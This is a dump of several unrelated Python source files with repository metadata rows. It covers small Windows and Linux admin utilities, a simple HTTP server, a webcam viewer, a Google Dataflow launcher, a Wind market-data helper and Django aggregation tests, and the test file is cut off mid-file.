# Set the variable old_ext with the second argument passed
old_ext = sys.argv[2]
# Set the variable new_ext with the third argument passed
new_ext = sys.argv[3]
batch_rename(work_dir, old_ext, new_ext)
if __name__ == '__main__':
main()
# Script Name : recyclebin.py
# Author : Craig Richards
# Created : 07th June 2013
# Last Modified :
# Version : 1.0
# Modifications :
# Description : Scans the recyclebin and displays the files in there, originally got this script from the Violent Python book
import os # Load the Module
import optparse # Load the Module
from _winreg import * # Load the Module
def sid2user(sid): # Start of the function to gather the user
try:
key = OpenKey(HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList" + '\\' + sid)
(value, type) = QueryValueEx(key, 'ProfileImagePath')
user = value.split('\\')[-1]
return user
except:
return sid
def returnDir(): # Start of the function to search through the recyclebin
dirs=['c:\\Recycler\\','C:\\Recycled\\','C:\\$RECYCLE.BIN\\']
#dirs=['c:\\$RECYCLE.BIN\\']
for recycleDir in dirs:
if os.path.isdir(recycleDir):
return recycleDir
return None
def findRecycled(recycleDir): # Start of the function, list the contents of the recyclebin
dirList = os.listdir(recycleDir)
for sid in dirList:
files = os.listdir(recycleDir + sid)
user = sid2user(sid)
print '\n[*] Listing Files for User: ' + str(user)
for file in files:
print '[+] Found File: ' + str(file)
def main():
recycleDir = returnDir()
findRecycled(recycleDir)
if __name__ == '__main__':
main()# Script Name : powerdown_startup.py
# Author : Craig Richards
# Created : 05th January 2012
# Last Modified :
# Version : 1.0
# Modifications :
# Description : This goes through the server list and pings the machine, if it's up it will load the putty session, if its not it will notify you.
import os # Load the Library Module
import subprocess # Load the Library Module
from time import strftime # Load just the strftime Module from Time
def windows(): # This is the function to run if it detects the OS is windows.
f = open('server_startup_'+strftime("%Y-%m-%d")+'.log', 'a') # Open the logfile
for server in open('startup_list.txt','r'): # Read the list of servers from the list
ret = subprocess.call("ping -n 3 %s" % server, shell=True,stdout=open('NUL', 'w'),stderr=subprocess.STDOUT) # Ping the servers in turn
if ret == 0: # If you get a response.
f.write ("%s: is alive, loading PuTTY session" % server.strip() + "\n") # Write out to the logfile
subprocess.Popen(('putty -load '+server)) # Load the putty session
else:
f.write ("%s : did not respond" % server.strip() + "\n") # Write to the logfile if the server is down
def linux():
f = open('server_startup_'+strftime("%Y-%m-%d")+'.log', 'a') # Open the logfile
for server in open('startup_list.txt'): # Read the list of servers from the list
ret = subprocess.call("ping -c 3 %s" % server, shell=True,stdout=open('/dev/null', 'w'),stderr=subprocess.STDOUT) # Ping the servers in turn
if ret == 0: # If you get a response.
f.write ("%s: is alive" % server.strip() + "\n") # Print a message
subprocess.Popen(['ssh', server.strip()])
else:
f.write ("%s: did not respond" % server.strip() + "\n")
# End of the functions
# Start of the Main Program
if os.name == "posix": # If the OS is linux...
linux() # Call the linux function
elif os.name in ("nt", "dos", "ce"): # If the OS is Windows...
windows() # Call the windows functionimport SimpleHTTPServer
import SocketServer
PORT = 8000 #This will serve at port 8080
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
httpd = SocketServer.TCPServer(("", PORT), Handler)
print "serving at port", PORT
httpd.serve_forever()# Script Name : folder_size.py
# Author : Craig Richards
# Created : 19th July 2012
# Last Modified : 22 February 2016
# Version : 1.0.1
# Modifications : Modified the Printing method and added a few comments
# Description : This will scan the current directory and all subdirectories and display the size.
import os
import sys ''' Load the library module and the sys module for the argument vector'''
try:
directory = sys.argv[1] # Set the variable directory to be the argument supplied by user.
except IndexError:
sys.exit("Must provide an argument.")
dir_size = 0 # Set the size to 0
fsizedicr = {'Bytes': 1,
'Kilobytes': float(1) / 1024,
'Megabytes': float(1) / (1024 * 1024),
'Gigabytes': float(1) / (1024 * 1024
* 1024)}
for (path, dirs, files) in os.walk(directory): # Walk through all the directories. For each iteration, os.walk returns the folders, subfolders and files in the dir.
for file in files: # Get all the files
filename = os.path.join(path, file)
dir_size += os.path.getsize(filename) # Add the size of each file in the root dir to get the total size.
fsizeList = [str(round(fsizedicr[key] * dir_size, 2)) + " " + key for key in fsizedicr] # List of units
if dir_size == 0: print ("File Empty") # Sanity check to eliminate corner-case of empty file.
else:
for units in sorted(fsizeList)[::-1]: # Reverse sort list of units so smallest magnitude units print first.
print ("Folder Size: " + units)# Script Name : env_check.py
# Author : Craig Richards
# Created : 14th May 2012
# Last Modified : 14 February 2016
# Version : 1.0.1
# Modifications : 1.0.1 - Tidy up comments and syntax
# Description : This script will check to see if all of the environment variables I require are set
import os
confdir = os.getenv("my_config") # Set the variable confdir from the OS environment variable
conffile = 'env_check.conf' # Set the variable conffile
conffilename = os.path.join(confdir, conffile) # Set the variable conffilename by joining confdir and conffile together
for env_check in open(conffilename): # Open the config file and read all the settings
env_check = env_check.strip() # Set the variable as itsself, but strip the extra text out
print '[{}]'.format(env_check) # Format the Output to be in Square Brackets
newenv = os.getenv(env_check) # Set the variable newenv to get the settings from the OS what is currently set for the settings out the configfile
if newenv is None: # If it doesn't exist
print env_check, 'is not set' # Print it is not set
else: # Else if it does exist
print 'Current Setting for {}={}\n'.format(env_check, newenv) # Print out the details# Script Name : script_count.py
# Author : Craig Richards
# Created : 27th February 2012
# Last Modified : 20th July 2012
# Version : 1.3
# Modifications : 1.1 - 28-02-2012 - CR - Changed inside github and development functions, so instead of if os.name = "posix" do this else do this etc
# : I used os.path.join, so it condensed 4 lines down to 1
# : 1.2 - 10-05-2012 - CR - Added a line to include PHP scripts.
# : 1.3 - 20-07-2012 - CR - Added the line to include Batch scripts
# Description : This scans my scripts directory and gives a count of the different types of scripts
import os # Load the library module
path = os.getenv("scripts") # Set the variable path by getting the value from the OS environment variable scripts
dropbox = os.getenv("dropbox") # Set the variable dropbox by getting the value from the OS environment variable dropbox
def clear_screen(): # Function to clear the screen
if os.name == "posix": # Unix/Linux/MacOS/BSD/etc
os.system('clear') # Clear the Screen
elif os.name in ("nt", "dos", "ce"): # DOS/Windows
os.system('CLS') # Clear the Screen
def count_files(path, extensions): # Start of the function to count the files in the scripts directory, it counts the extension when passed below
counter = 0 # Set the counter to 0
for root, dirs, files in os.walk(path): # Loop through all the directories in the given path
for file in files: # For all the files
counter += file.endswith(extensions) # Count the files
return counter # Return the count
def github(): # Start of the function just to count the files in the github directory
github_dir = os.path.join(dropbox, 'github') # Joins the paths to get the github directory - 1.1
github_count = sum((len(f) for _, _, f in os.walk(github_dir))) # Get a count for all the files in the directory
if github_count > 5: # If the number of files is greater then 5, then print the following messages
print '\nYou have too many in here, start uploading !!!!!'
print 'You have: ' + str(github_count) + ' waiting to be uploaded to github!!'
elif github_count == 0: # Unless the count is 0, then print the following messages
print '\nGithub directory is all Clear'
else: # If it is any other number then print the following message, showing the number outstanding.
print '\nYou have: ' + str(github_count) + ' waiting to be uploaded to github!!'
def development(): # Start of the function just to count the files in the development directory
dev_dir = os.path.join(path, 'development') # Joins the paths to get the development directory - 1.1
dev_count = sum((len(f) for _, _, f in os.walk(dev_dir))) # Get a count for all the files in the directory
if dev_count > 10: # If the number of files is greater then 10, then print the following messages
print '\nYou have too many in here, finish them or delete them !!!!!'
print 'You have: ' + str(dev_count) + ' waiting to be finished!!'
elif dev_count ==0: # Unless the count is 0, then print the following messages
print '\nDevelopment directory is all clear'
else:
print '\nYou have: ' + str(dev_count) + ' waiting to be finished!!' # If it is any other number then print the following message, showing the number outstanding.
clear_screen() # Call the function to clear the screen
print '\nYou have the following :\n'
print 'AutoIT:\t' + str(count_files(path, '.au3')) # Run the count_files function to count the files with the extension we pass
print 'Batch:\t' + str(count_files(path, ('.bat', ',cmd'))) # 1.3
print 'Perl:\t' + str(count_files(path, '.pl'))
print 'PHP:\t' + str(count_files(path, '.php')) # 1.2
print 'Python:\t' + str(count_files(path, '.py'))
print 'Shell:\t' + str(count_files(path, ('.ksh', '.sh', '.bash')))
print 'SQL:\t' + str(count_files(path, '.sql'))
github() # Call the github function
development() # Call the development function# Script Name : script_listing.py
# Author : Craig Richards
# Created : 15th February 2012
# Last Modified : 29th May 2012
# Version : 1.2
# Modifications : 1.1 - 28-02-2012 - CR - Added the variable to get the logs directory, I then joined the output so the file goes to the logs directory
# : 1.2 - 29-05/2012 - CR - Changed the line so it doesn't ask for a directory, it now uses the environment varaible scripts
# Description : This will list all the files in the given directory, it will also go through all the subdirectories as well
import os # Load the library module
logdir = os.getenv("logs") # Set the variable logdir by getting the value from the OS environment variable logs
logfile = 'script_list.log' # Set the variable logfile
path = os.getenv("scripts") # Set the varable path by getting the value from the OS environment variable scripts - 1.2
#path = (raw_input("Enter dir: ")) # Ask the user for the directory to scan
logfilename = os.path.join(logdir, logfile) # Set the variable logfilename by joining logdir and logfile together
log = open(logfilename, 'w') # Set the variable log and open the logfile for writing
for dirpath, dirname, filenames in os.walk(path): # Go through the directories and the subdirectories
for filename in filenames: # Get all the filenames
log.write(os.path.join(dirpath, filename)+'\n') # Write the full path out to the logfile
print ("\nYour logfile " , logfilename, "has been created") # Small message informing the user the file has been createdimport numpy as np
import cv2
cap = cv2.VideoCapture(0)
while(True):
# Capture frame-by-frame
ret, frame = cap.read()
# Our operations on the frame come here
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
# Display the resulting frame
cv2.imshow('frame',gray)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
# When everything done, release the capture
cap.release()
cv2.destroyAllWindows() | [
"ekkya@tcd.ie"
] | ekkya@tcd.ie |
288b5306f323b0024d8bdacbb104e4fef3aef131 | f31fda8014ecadf6af7d4e3392fb917c49e0352a | /HeavyIonsAnalysis/VertexAnalysis/python/__init__.py | 33e53c5f468fb19b01b06f042239cab6d2875ca9 | [] | no_license | jniedzie/lightbylight | acea5051f053c49824a49a0b78bac3a2247ee75f | f5a4661fcf3fd3c0e9ccd8893a46a238e30c2aa8 | refs/heads/master | 2020-03-18T12:24:31.970468 | 2018-02-09T15:50:00 | 2018-02-09T15:50:00 | 134,724,759 | 0 | 1 | null | 2018-05-24T14:11:12 | 2018-05-24T14:11:12 | null | UTF-8 | Python | false | false | 216 | py | #Automatically created by SCRAM
import os
__path__.append(os.path.dirname(os.path.abspath(__file__).rsplit('/HeavyIonsAnalysis/VertexAnalysis/',1)[0])+'/cfipython/slc6_amd64_gcc491/HeavyIonsAnalysis/VertexAnalysis')
| [
"rchudasa@cern.ch"
] | rchudasa@cern.ch |
e429bc43021bd26b4ced08927e9dbec8c65dc8ea | 5e93ffc8068809e2f8ee532ed9bdf0e367ef9742 | /ejer8.py | 59ff40c035ad98ad4bc74b74e89c459b0f73be33 | [] | no_license | Vides99/FP_Laboratorio_6_00368019 | cb9b0f7257537b9ef4aaadb09a4e7b884e064e69 | 0ab61780e52923ad7b18e22cebf6ca0b3d4bed76 | refs/heads/master | 2020-08-10T05:58:52.666540 | 2019-10-16T18:05:49 | 2019-10-16T18:05:49 | 214,276,137 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 219 | py | numeroAmultiplicar = int(input("Ingrese el numero del cual quiere conocer la tabla (dicha tabla sera del 1 hasta el 10)"))
for i in range (1,11):
print(numeroAmultiplicar, " * ", i, " = ", (numeroAmultiplicar * i))
| [
"noreply@github.com"
] | noreply@github.com |
a3a78eb8bcaa7274ca583df0322a09926713b306 | 21f4b333d2a3693a665826b083be473eb9c8ea99 | /webapp/DataflowApi.py | 4c67b71536b0198cbc3a0f5f6c5539c7ed8d5f53 | [
"Apache-2.0"
] | permissive | khanhhale/IoTProjectWithPylonCamera | 3e4bdbd58379e6b9e5fea445336a6b6eae4125f7 | cd51315053afc542e22e644d471a97a18509dfc6 | refs/heads/master | 2021-05-11T17:32:38.492614 | 2018-10-26T00:28:15 | 2018-10-26T00:28:15 | 117,800,569 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,317 | py | # Copyright 2017, Google LLC All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import io
import json
import logging
from Utility import *
class DataflowApi(Utility):
def __init__(self):
"""
Description:
This contructor function initialize super class object
Args:
None
Returns:
None
"""
super(DataflowApi,self).__init__()
def create_dataflow_job_PubSub_to_GCS(self, client, PROJECT, JOBNAME, BUCKET, topic, table):
"""
Description:
create a dataflow job
Args:
client: client service object
PROJECT: project id
JOBNAME: name of dataflow job
topic: full path to topic name. Ex: projects/cloud-iot-testing-185623/topics/cloud-iot-topic1
table: full path to a table name. Ex: projectid:datasetid.tableid
Returns:
On success: a json object
On failure: None or an exception will be thrown.
Raises:
An exception if the subscription cannot be created.
"""
GCSPATH = "gs://dataflow-templates/latest/Cloud_PubSub_to_GCS_Text"
BODY = {
"jobName": "{jobname}".format(jobname=JOBNAME),
"parameters": {
"inputTopic": topic,
"outputDirectory": "gs://{bucket}/camera/".format(bucket=BUCKET),
"outputFilenamePrefix": "output-",
"outputFilenameSuffix": ".txt",
},
"environment": {
"tempLocation": "gs://{bucket}/tmp".format(bucket=BUCKET),
"zone": "us-central1-f"
}
}
try:
request = client.projects().templates().launch(projectId=PROJECT, gcsPath=GCSPATH, body=BODY)
response = request.execute()
return response
except Exception as e:
print "Exception: %s, cannot publish message" % e
raise
| [
"khanhl@khanhl-glaptop.roam.corp.google.com"
] | khanhl@khanhl-glaptop.roam.corp.google.com |
2eff8e1f3b21be34329ac979322bd7291501bcac | d5058adfd456aa7950ea5a0c2918f8b6749b7bdf | /Utils/windHelper.py | d4bffa44d786bbfe314afb8c977037e8b7b837e5 | [] | no_license | dxcv/pyLuke | 1f6ae3ffd0ef8afe3d5505324b59ed7e5ed5442c | 99e4e762f00fb20f15aa4835e0ecea433695dff6 | refs/heads/master | 2020-05-29T12:34:18.349194 | 2017-10-12T02:12:09 | 2017-10-12T02:12:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,470 | py | # encoding: utf-8
# thd
from WindPy import w
import pandas as pd
from datetime import timedelta, datetime
class WindHelper(object):
"""
WindPy20170904更新
在本次修改后, 下面函数结果中的时间Times将只包含日期date:
wsd, tdays, tdayscount, tdaysoffset, wset, weqs, wpd, htocode, edb
常用字段:
close
settle
volume
"""
@staticmethod
def getMultiTimeSeriesDataFrame(codeList, beginDate, endDate, para, period="",
tradingCalendar="", priceAdj="", credibility=0):
"""
para只能是一个参数
get time series from windPy, each code represents one capture
月度合约: trade_hiscode
:param credibility: (int)
:param codeList: (list)
:param beginDate: (date or datetime)
:param endDate: (date or datetime)
:param para: (string)只能是一个字符参数
:param period: (int) 频率
:param tradingCalendar: (string) 交易日历,选择可以选择银行间:NIB,不选择,则默认交易所日历
:param priceAdj: (string) 价格是否调整,F:前复权,B:后复权
:return: (DataFrame)
"""
try:
w.start()
codeListStr = ",".join(codeList)
period = ("Period=" + period) if period == "W" else ""
tradingCalendar = ("TradingCalendar=" + tradingCalendar) if tradingCalendar != "" else ""
priceAdj = ("priceAdj=" + priceAdj) if priceAdj != "" else ""
credibility = ("credibility=" + str(credibility)) if credibility != 0 else ""
windData = w.wsd(codeListStr,
para,
beginDate.strftime("%Y-%m-%d"),
endDate.strftime("%Y-%m-%d"),
period,
tradingCalendar,
priceAdj, credibility)
if len(windData.Data) == 0:
raise BaseException
if len(windData.Data[0]) == 0:
raise BaseException
dataDict = {}
for i in range(len(windData.Data)):
dataDict[windData.Codes[i].lower() + "_" + para] = windData.Data[i]
df = pd.DataFrame(dataDict, index=windData.Times)
df.index = pd.to_datetime(df.index)
df.index.name = "trade_date"
return df
except BaseException as e:
print(e.message)
raise
@staticmethod
def getTimeSeriesDataFrame(code, beginDate, endDate, paraList, period="",
tradingCalendar="", priceAdj="", credibility=0):
"""
get time series from windPy, each code represents one capture
月度合约: trade_hiscode
:param credibility: (int)
:param code: (string)
:param beginDate: (date or datetime)
:param endDate: (date or datetime)
:param paraList: (list)
:param period: (int) 频率
:param tradingCalendar: (string) 交易日历,选择可以选择银行间:NIB,不选择,则默认交易所日历
:param priceAdj: (string) 价格是否调整,F:前复权,B:后复权
:return: (DataFrame)
"""
try:
w.start()
para = ",".join(paraList)
period = ("Period=" + period) if period == "W" else ""
tradingCalendar = ("TradingCalendar=" + tradingCalendar) if tradingCalendar != "" else ""
priceAdj = ("priceAdj=" + priceAdj) if priceAdj != "" else ""
credibility = ("credibility=" + str(credibility)) if credibility != 0 else ""
windData = w.wsd(code,
para,
beginDate.strftime("%Y-%m-%d"),
endDate.strftime("%Y-%m-%d"),
tradingCalendar,
priceAdj, credibility)
if len(windData.Data) == 0:
raise BaseException
if len(windData.Data[0]) == 0:
raise BaseException
dataDict = {}
for i in range(len(windData.Data)):
dataDict[windData.Fields[i].lower()] = windData.Data[i]
df = pd.DataFrame(dataDict, index=windData.Times)
df.index = pd.to_datetime(df.index)
df.index.name = "trade_date"
return df
except BaseException as e:
print(e.message)
raise
@staticmethod
def getMinTimeSeriesDataFrame(code, beginDate, endDate, paraList, bar_size=1):
"""
获取分钟级别数据
get time series from windPy, each code represents one capture
月度合约: trade_hiscode
:param bar_size: (int) The frequency of the data
:param code: string
:param beginDate: date or datetime
:param endDate: date or datetime
:param paraList: list
:return: DataFrame
"""
try:
w.start()
para = ",".join(paraList)
bar_size = "" + bar_size if bar_size is not None else ""
windData = w.wsi(code,
para,
beginDate.strftime("%Y-%m-%d %H:%M:%S"),
endDate.strftime("%Y-%m-%d %H:%M:%S"), "")
if len(windData.Data) == 0:
raise BaseException
if len(windData.Data[0]) == 0:
raise BaseException
dataDict = {}
for i in range(len(windData.Data)):
dataDict[windData.Fields[i].lower()] = windData.Data[i]
df = pd.DataFrame(dataDict, index=windData.Times)
if df.index[0].to_pydatetime().microsecond != 0:
df.index -= timedelta(microseconds=df.index[0].to_pydatetime().microsecond)
df.index.name = "trade_date"
return df
except BaseException as e:
print(e.message)
raise
@staticmethod
def getInfoDataFrame(code, paraList):
"""
get info of one product by code
:return: DataFrame
:param code:
:param paraList:
:return: DataFrame;
"""
try:
w.start()
para = ",".join(paraList)
windData = w.wss(code,
para)
if len(windData.Data) == 0:
return None
if len(windData.Data[0]) == 0:
return None
dataDict = {}
for i in range(len(windData.Data)):
dataDict[windData.Fields[i].lower()] = windData.Data[i]
df = pd.DataFrame(dataDict)
df = df[paraList]
return df
except BaseException as e:
print(e.message)
raise
@staticmethod
def getEDBTimeSeriesDataFrame(codeList, beginDate, endDate, fillChoice="Previous"):
"""
宏观数据提取
get edb time series from windPy, each code represents one capture
: Param fillChoice: (string) previous或者None,空值数据是否需要被前一日的数据取代
"""
codeListStr = ",".join(codeList)
try:
w.start()
if fillChoice == "Previous":
windData = w.edb(codeListStr,
beginDate.strftime("%Y-%m-%d"),
endDate.strftime("%Y-%m-%d"),
"Fill=" + fillChoice)
else:
windData = w.edb(codeListStr,
beginDate.strftime("%Y-%m-%d"),
endDate.strftime("%Y-%m-%d"))
if len(windData.Data) == 0:
return None
if len(windData.Data[0]) == 0:
return None
dataDict = {}
for i in range(len(windData.Data)):
dataDict[windData.Codes[i]] = windData.Data[i]
df = pd.DataFrame(dataDict, index=windData.Times)
df.index = pd.to_datetime(df.index)
df.index.name = "trade_date"
return df
except BaseException as e:
print(e.message)
raise
@staticmethod
def getOffsetDays(offset=0, curDate=datetime.now()):
try:
w.start()
result = w.tdaysoffset(offset, curDate.strftime("%Y-%m-%d"), "").Data[0][0]
return result
except IndexError as e:
print(e.message)
raise
@staticmethod
def daysCount(firstDate, secondDate):
w.start()
result = w.tdayscount(firstDate.strftime("%Y-%m-%d"), secondDate.strftime("%Y-%m-%d"), "").Data[0][0]
return result
@staticmethod
def getAllTrsFtCodes(beginDate, endDate):
w.start()
pass
def test():
beginDate = datetime(2008, 12, 1)
endDate = datetime(2017, 8, 30)
# df = WindHelper.getEDBTimeSeriesDataFrame(["S0059749"], beginDate=beginDate, endDate=endDate)
codeList = ["T1612.CFE", "T1703.CFE"]
para = "settle"
df = WindHelper.getMultiTimeSeriesDataFrame(codeList=codeList, beginDate=datetime(2016, 5, 1),
endDate=datetime(2016, 12, 11), para=para)
print(df)
if __name__ == "__main__":
test()
| [
"wangluzhou@aliyun.com"
] | wangluzhou@aliyun.com |
5ba6618f5ca4b1f7c28f8cf76de9006dff006b9f | b2f9ff599a4869db733dc5f4fa93c2a47cff9064 | /brainduck/brainduck.py | 6e57bb478fe25d806fe2c45505aa9e98900f76a7 | [
"MIT"
] | permissive | eaybek/brainduck | e9ae7159ee9ad6d21ecc5a3fb5b012cb44a680a5 | f45dea58a39dc543d9bbf9cdc4732cbdd8f7c0ea | refs/heads/master | 2020-07-31T16:43:40.541858 | 2019-09-24T19:15:11 | 2019-09-24T19:15:11 | 210,679,342 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 85 | py | class Brainduck(object):
pass
if __name__ == "__main__":
print('It works!')
| [
"eaybek@gmail.com"
] | eaybek@gmail.com |
312796ff98fadf97216ff3c7db06d5b89af9ed2e | cfb01066c08fc4f4b0ab481dc0ff7c6ce2fb9981 | /tests/aggregation/tests.py | e81744df29bd81e34a3ccbb0ab02cadb210194f6 | [
"MIT"
] | permissive | pombredanne/django-aggregate-if | 21a8dc460f73d629b79be0c54356c70d92048780 | 02f43633c620de53aa7b9479523bbba8013a3900 | refs/heads/master | 2021-01-23T01:30:13.182765 | 2013-01-02T23:47:45 | 2013-01-02T23:47:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23,983 | py | from __future__ import absolute_import
import datetime
from decimal import Decimal
from django.db.models import Q, F
from django.test import TestCase, Approximate
from aggregate_if import Sum, Count, Avg, Max, Min
from .models import Author, Publisher, Book, Store
class BaseAggregateTestCase(TestCase):
fixtures = ["aggregation.json"]
def test_empty_aggregate(self):
self.assertEqual(Author.objects.all().aggregate(), {})
def test_single_aggregate(self):
vals = Author.objects.aggregate(Avg("age"))
self.assertEqual(vals, {"age__avg": Approximate(37.4, places=1)})
vals = Author.objects.aggregate(Sum("age", only=Q(age__gt=29)))
self.assertEqual(vals, {"age__sum": 254})
vals = Author.objects.extra(select={'testparams':'age < %s'}, select_params=[0])\
.aggregate(Sum("age", only=Q(age__gt=29)))
self.assertEqual(vals, {"age__sum": 254})
vals = Author.objects.aggregate(Sum("age", only=Q(name__icontains='jaco')|Q(name__icontains='adrian')))
self.assertEqual(vals, {"age__sum": 69})
def test_multiple_aggregates(self):
vals = Author.objects.aggregate(Sum("age"), Avg("age"))
self.assertEqual(vals, {"age__sum": 337, "age__avg": Approximate(37.4, places=1)})
vals = Author.objects.aggregate(Sum("age", only=Q(age__gt=29)), Avg("age"))
self.assertEqual(vals, {"age__sum": 254, "age__avg": Approximate(37.4, places=1)})
def test_filter_aggregate(self):
vals = Author.objects.filter(age__gt=29).aggregate(Sum("age"))
self.assertEqual(len(vals), 1)
self.assertEqual(vals["age__sum"], 254)
vals = Author.objects.filter(age__gt=29).aggregate(Sum("age", only=Q(age__lt=29)))
# If there are no matching aggregates, then None, not 0 is the answer.
self.assertEqual(vals["age__sum"], None)
def test_related_aggregate(self):
vals = Author.objects.aggregate(Avg("friends__age"))
self.assertEqual(len(vals), 1)
self.assertAlmostEqual(vals["friends__age__avg"], 34.07, places=2)
vals = Author.objects.aggregate(Avg("friends__age", only=Q(age__lt=29)))
self.assertEqual(len(vals), 1)
self.assertAlmostEqual(vals["friends__age__avg"], 33.67, places=2)
vals2 = Author.objects.filter(age__lt=29).aggregate(Avg("friends__age"))
self.assertEqual(vals, vals2)
vals = Author.objects.aggregate(Avg("friends__age", only=Q(friends__age__lt=35)))
self.assertEqual(len(vals), 1)
self.assertAlmostEqual(vals["friends__age__avg"], 28.75, places=2)
# The average age of author's friends, whose age is lower than the authors age.
vals = Author.objects.aggregate(Avg("friends__age", only=Q(friends__age__lt=F('age'))))
self.assertEqual(len(vals), 1)
self.assertAlmostEqual(vals["friends__age__avg"], 30.43, places=2)
vals = Book.objects.filter(rating__lt=4.5).aggregate(Avg("authors__age"))
self.assertEqual(len(vals), 1)
self.assertAlmostEqual(vals["authors__age__avg"], 38.2857, places=2)
vals = Author.objects.all().filter(name__contains="a").aggregate(Avg("book__rating"))
self.assertEqual(len(vals), 1)
self.assertEqual(vals["book__rating__avg"], 4.0)
vals = Book.objects.aggregate(Sum("publisher__num_awards"))
self.assertEqual(len(vals), 1)
self.assertEqual(vals["publisher__num_awards__sum"], 30)
vals = Publisher.objects.aggregate(Sum("book__price"))
self.assertEqual(len(vals), 1)
self.assertEqual(vals["book__price__sum"], Decimal("270.27"))
def test_aggregate_multi_join(self):
vals = Store.objects.aggregate(Max("books__authors__age"))
self.assertEqual(len(vals), 1)
self.assertEqual(vals["books__authors__age__max"], 57)
vals = Store.objects.aggregate(Max("books__authors__age", only=Q(books__authors__age__lt=56)))
self.assertEqual(len(vals), 1)
self.assertEqual(vals["books__authors__age__max"], 46)
vals = Author.objects.aggregate(Min("book__publisher__num_awards"))
self.assertEqual(len(vals), 1)
self.assertEqual(vals["book__publisher__num_awards__min"], 1)
def test_aggregate_alias(self):
vals = Store.objects.filter(name="Amazon.com").aggregate(amazon_mean=Avg("books__rating"))
self.assertEqual(len(vals), 1)
self.assertAlmostEqual(vals["amazon_mean"], 4.08, places=2)
def test_annotate_basic(self):
self.assertQuerysetEqual(
Book.objects.annotate().order_by('pk'), [
"The Definitive Guide to Django: Web Development Done Right",
"Sams Teach Yourself Django in 24 Hours",
"Practical Django Projects",
"Python Web Development with Django",
"Artificial Intelligence: A Modern Approach",
"Paradigms of Artificial Intelligence Programming: Case Studies in Common Lisp"
],
lambda b: b.name
)
books = Book.objects.annotate(mean_age=Avg("authors__age"))
b = books.get(pk=1)
self.assertEqual(
b.name,
'The Definitive Guide to Django: Web Development Done Right'
)
self.assertEqual(b.mean_age, 34.5)
'''
def test_f_expression(self):
publishers = Publisher.objects.annotate(avg_rating=Avg(F('book__rating') - 0))
publishers = publishers.values_list('id', 'avg_rating').order_by('id')
self.assertEqual(list(publishers), [(1, 4.25), (2, 3.0), (3, 4.0), (4, 5.0), (5, None)])
def test_only_condition_with_join(self):
# Test extra-select
books = Book.objects.annotate(mean_age=Avg("authors__age"))
books = books.annotate(mean_age2=Avg('authors__age', only=Q(authors__age__gte=0)))
books = books.extra(select={'testparams': 'publisher_id = %s'}, select_params=[1])
b = books.get(pk=1)
self.assertEqual(b.mean_age, 34.5)
self.assertEqual(b.mean_age2, 34.5)
self.assertEqual(b.testparams, True)
def test_relabel_aliases(self):
# Test relabel_aliases
excluded_authors = Author.objects.annotate(book_rating=Min(F('book__rating') + 5, only=Q(pk__gte=1)))
excluded_authors = excluded_authors.filter(book_rating__lt=0)
books = books.exclude(authors__in=excluded_authors)
b = books.get(pk=1)
self.assertEqual(b.mean_age, 34.5)
def test_joins_in_f(self):
# Test joins in F-based annotation
books = Book.objects.annotate(oldest=Max(F('authors__age')))
books = books.values_list('rating', 'oldest').order_by('rating', 'oldest')
self.assertEqual(
list(books),
[(3.0, 45), (4.0, 29), (4.0, 37), (4.0, 57), (4.5, 35), (5.0, 57)]
)
'''
def test_annotate_m2m(self):
books = Book.objects.filter(rating__lt=4.5).annotate(Avg("authors__age")).order_by("name")
self.assertQuerysetEqual(
books, [
('Artificial Intelligence: A Modern Approach', 51.5),
('Practical Django Projects', 29.0),
('Python Web Development with Django', Approximate(30.3, places=1)),
('Sams Teach Yourself Django in 24 Hours', 45.0)
],
lambda b: (b.name, b.authors__age__avg),
)
books = Book.objects.annotate(num_authors=Count("authors")).order_by("name")
self.assertQuerysetEqual(
books, [
('Artificial Intelligence: A Modern Approach', 2),
('Paradigms of Artificial Intelligence Programming: Case Studies in Common Lisp', 1),
('Practical Django Projects', 1),
('Python Web Development with Django', 3),
('Sams Teach Yourself Django in 24 Hours', 1),
('The Definitive Guide to Django: Web Development Done Right', 2)
],
lambda b: (b.name, b.num_authors)
)
def test_backwards_m2m_annotate(self):
authors = Author.objects.filter(name__contains="a").annotate(Avg("book__rating")).order_by("name")
self.assertQuerysetEqual(
authors, [
('Adrian Holovaty', 4.5),
('Brad Dayley', 3.0),
('Jacob Kaplan-Moss', 4.5),
('James Bennett', 4.0),
('Paul Bissex', 4.0),
('Stuart Russell', 4.0)
],
lambda a: (a.name, a.book__rating__avg)
)
authors = Author.objects.annotate(num_books=Count("book")).order_by("name")
self.assertQuerysetEqual(
authors, [
('Adrian Holovaty', 1),
('Brad Dayley', 1),
('Jacob Kaplan-Moss', 1),
('James Bennett', 1),
('Jeffrey Forcier', 1),
('Paul Bissex', 1),
('Peter Norvig', 2),
('Stuart Russell', 1),
('Wesley J. Chun', 1)
],
lambda a: (a.name, a.num_books)
)
def test_reverse_fkey_annotate(self):
books = Book.objects.annotate(Sum("publisher__num_awards")).order_by("name")
self.assertQuerysetEqual(
books, [
('Artificial Intelligence: A Modern Approach', 7),
('Paradigms of Artificial Intelligence Programming: Case Studies in Common Lisp', 9),
('Practical Django Projects', 3),
('Python Web Development with Django', 7),
('Sams Teach Yourself Django in 24 Hours', 1),
('The Definitive Guide to Django: Web Development Done Right', 3)
],
lambda b: (b.name, b.publisher__num_awards__sum)
)
publishers = Publisher.objects.annotate(Sum("book__price")).order_by("name")
self.assertQuerysetEqual(
publishers, [
('Apress', Decimal("59.69")),
("Jonno's House of Books", None),
('Morgan Kaufmann', Decimal("75.00")),
('Prentice Hall', Decimal("112.49")),
('Sams', Decimal("23.09"))
],
lambda p: (p.name, p.book__price__sum)
)
def test_annotate_values(self):
books = list(Book.objects.filter(pk=1).annotate(mean_age=Avg("authors__age")).values())
self.assertEqual(
books, [
{
